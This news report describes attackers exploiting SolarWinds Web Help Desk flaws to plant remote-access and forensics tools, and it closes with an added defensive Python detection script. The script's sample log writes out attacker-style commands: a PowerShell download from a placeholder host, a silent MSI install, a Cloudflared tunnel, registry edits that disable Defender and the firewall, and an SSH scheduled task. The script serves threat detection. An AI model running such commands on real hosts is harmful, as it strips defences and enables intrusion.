Hackers Use SolarWinds Flaws to Deploy DFIR Tool in Attacks

Summary
– Hackers are exploiting critical SolarWinds Web Help Desk vulnerabilities (CVE-2025-40551 and CVE-2025-26399) to gain unauthorized access to systems.
– The attackers deploy legitimate tools like Zoho ManageEngine Assist for remote access and reconnaissance, and Velociraptor for malicious command and control.
– They use Cloudflare tunnels for persistence and redundancy, and disable Windows Defender to avoid detection when fetching payloads.
– Researchers from Huntress and Microsoft observed these attacks but have not attributed them to a specific threat group or disclosed the targets.
– Mitigation includes upgrading SolarWinds WHD, removing its admin interfaces from public internet access, and resetting associated credentials.
Cybersecurity researchers have uncovered a sophisticated attack campaign where malicious actors are actively exploiting critical vulnerabilities in SolarWinds Web Help Desk software. This activity allows them to deploy legitimate remote management and incident response tools for harmful purposes, establishing persistent access and command-and-control infrastructure within targeted networks. The campaign underscores the growing trend of attackers weaponizing trusted software to evade detection and carry out intrusions.
The malicious activity was first identified by analysts at Huntress Security, who believe the campaign began in mid-January. The attackers specifically leverage two critical-severity vulnerabilities, CVE-2025-40551 and CVE-2025-26399, which enable remote code execution without requiring any authentication. These flaws were recently disclosed and have already been flagged by the Cybersecurity and Infrastructure Security Agency (CISA) as being actively exploited. Following initial access, the threat actors rapidly deploy a suite of tools to maintain their foothold.
The attack chain begins with the installation of the Zoho ManageEngine Assist remote access agent. The attackers fetch the installer from a public file-hosting service, configure it for unattended access, and register the compromised machine to an account linked to an anonymous email service. This tool provides them with direct, hands-on-keyboard control and is used for initial reconnaissance within the network environment.
A key component of the intrusion is the deployment of Velociraptor, a powerful digital forensics and incident response platform that is being repurposed as a command-and-control framework. In these attacks, the tool communicates with the attackers’ servers through Cloudflare Workers. Notably, the hackers used an outdated version of Velociraptor that contains a known privilege escalation vulnerability, allowing them to increase their permissions on the host system.
For redundancy and persistence, the attackers also establish Cloudflare tunnels using the official Cloudflared utility. This creates a secondary, tunnel-based access channel to ensure they maintain communication with the compromised host even if primary methods are blocked. In some instances, they created a scheduled task to open a Secure Shell backdoor, providing yet another avenue for access.
To operate without hindrance, the threat actors took deliberate steps to disable security software. They modified the Windows registry to turn off Windows Defender and the Windows Firewall. Shortly after disabling these protections, they downloaded a fresh copy of the Visual Studio Code binary, potentially to use its tunneling capabilities or for other post-exploitation activities.
While Microsoft researchers have also observed multi-stage intrusions targeting internet-exposed SolarWinds WHD instances, neither they nor Huntress have attributed these attacks to a known threat group. Microsoft described the compromised environments as “high-value assets,” but no specific information about the victim organizations has been released.
To defend against these exploits, system administrators are urged to take immediate action. Applying security updates to upgrade SolarWinds Web Help Desk to version 2026.1 or later is the most critical step. It is also highly recommended to remove public internet access to the WHD administrative interfaces and to reset all credentials associated with the product. Huntress has shared detection rules and indicators of compromise to help security teams identify activity related to Zoho Assist, Velociraptor, Cloudflared, and suspicious MSI installations or PowerShell executions.
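As an added illustration of what such detection logic can look like (this is not Huntress's or Microsoft's published rules, nor code from the report), the following Python triage pass scans constructed Sysmon-style JSON events for the behaviours the article lists: a quiet MSI install of the Zoho remote-access agent, a Velociraptor client start, a Cloudflared tunnel, a scheduled task pointing at an SSH binary, a PowerShell download, and registry writes that switch off Defender or the firewall. The event shape, the registry value names checked, the WebHelpDesk install path used as a parent-process anchor, and every path, hostname and token in the sample log are assumptions made for the example.

```python
"""Added triage example over constructed endpoint telemetry (not the report's code)."""
import json
import re
from collections import Counter

# Constructed sample log, one Sysmon-like JSON object per line. Paths, hosts,
# tokens and task names are made up; only the tool names come from the report.
SAMPLE_LOG = r"""
{"EventType":"ProcessCreate","Image":"C:\\Windows\\System32\\msiexec.exe","CommandLine":"msiexec.exe /i C:\\Users\\Public\\ZohoAssist.msi /qn","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"}
{"EventType":"ProcessCreate","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -NoProfile -Command Invoke-WebRequest -Uri https://files.example.invalid/agent.zip -OutFile C:\\ProgramData\\agent.zip","ParentImage":"C:\\Program Files\\WebHelpDesk\\bin\\java.exe"}
{"EventType":"ProcessCreate","Image":"C:\\ProgramData\\velociraptor.exe","CommandLine":"velociraptor.exe client --config C:\\ProgramData\\client.config.yaml","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"EventType":"ProcessCreate","Image":"C:\\ProgramData\\cloudflared.exe","CommandLine":"cloudflared.exe tunnel run --token PLACEHOLDER_TOKEN","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"EventType":"RegistryValueSet","Image":"C:\\Windows\\regedit.exe","TargetObject":"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware","Details":"DWORD (0x00000001)"}
{"EventType":"RegistryValueSet","Image":"C:\\Windows\\regedit.exe","TargetObject":"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\EnableFirewall","Details":"DWORD (0x00000000)"}
{"EventType":"ProcessCreate","Image":"C:\\Windows\\System32\\schtasks.exe","CommandLine":"schtasks.exe /create /tn Updater /tr C:\\ProgramData\\ssh\\sshd.exe /sc onstart","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"EventType":"ProcessCreate","Image":"C:\\Windows\\System32\\notepad.exe","CommandLine":"notepad.exe","ParentImage":"C:\\Windows\\explorer.exe"}
{"EventType":"RegistryValueSet","Image":"C:\\Windows\\explorer.exe","TargetObject":"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden","Details":"DWORD (0x00000001)"}
"""

# Assumed default WebHelpDesk install location, used only as a parent-process anchor.
WHD_PARENT_MARKER = "webhelpdesk"
SHELLS_FROM_WHD = ("cmd.exe", "powershell.exe", "msiexec.exe", "certutil.exe")


def _cmd(e):
    """Lower-cased image path plus command line for substring/regex matching."""
    return (e.get("Image", "") + " " + e.get("CommandLine", "")).lower()


def rule_unattended_msi_install(e):
    # msiexec with a quiet/no-UI switch: matches the unattended agent install.
    c = _cmd(e)
    return "msiexec" in c and re.search(r"\s/(qn|quiet|q)\b", c) is not None


def rule_remote_access_agent(e):
    return re.search(r"zoho|manageengine", _cmd(e)) is not None


def rule_velociraptor_client(e):
    return "velociraptor" in _cmd(e)


def rule_cloudflared_tunnel(e):
    return "cloudflared" in _cmd(e)


def rule_scheduled_task_ssh(e):
    c = _cmd(e)
    return "schtasks" in c and "/create" in c and "ssh" in c


def rule_powershell_download(e):
    c = _cmd(e)
    return "powershell" in c and re.search(
        r"invoke-webrequest|downloadstring|downloadfile|start-bitstransfer", c) is not None


def rule_whd_spawned_shell(e):
    # Shell or installer spawned by the WHD service process (assumed path marker).
    parent = e.get("ParentImage", "").lower()
    child = e.get("Image", "").lower().rsplit("\\", 1)[-1]
    return WHD_PARENT_MARKER in parent and child in SHELLS_FROM_WHD


def rule_security_tooling_disabled(e):
    # Registry writes that turn Defender off or the firewall off (assumed value names).
    if e.get("EventType") != "RegistryValueSet":
        return False
    key = e.get("TargetObject", "").lower()
    val = e.get("Details", "").lower()
    defender_off = ("windows defender" in key
                    and key.endswith(("disableantispyware", "disablerealtimemonitoring"))
                    and val.endswith("(0x00000001)"))
    firewall_off = ("firewallpolicy" in key and key.endswith("enablefirewall")
                    and val.endswith("(0x00000000)"))
    return defender_off or firewall_off


RULES = {name[5:]: fn for name, fn in globals().items() if name.startswith("rule_")}


def triage(log_text):
    """Return (rule_name, line_no, image) for every rule that fires on every event."""
    hits = []
    for line_no, line in enumerate((l for l in log_text.splitlines() if l.strip()), 1):
        event = json.loads(line)
        for name, fn in RULES.items():
            if fn(event):
                hits.append((name, line_no, event.get("Image", "")))
    return hits


def summarize(hits):
    """Count how many times each rule fired."""
    return Counter(name for name, _, _ in hits)


if __name__ == "__main__":
    for name, line_no, image in triage(SAMPLE_LOG):
        print(f"line {line_no}: {name} ({image})")
```

The two benign events at the end of the sample (a notepad launch and an Explorer preference write) produce no hits, which is the sanity check worth keeping when tuning rules like these: the substring matches are deliberately broad, so anything that fires on ordinary administration should be narrowed with parent-process or path conditions, as the WHD-parent rule does.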
(Source: Bleeping Computer)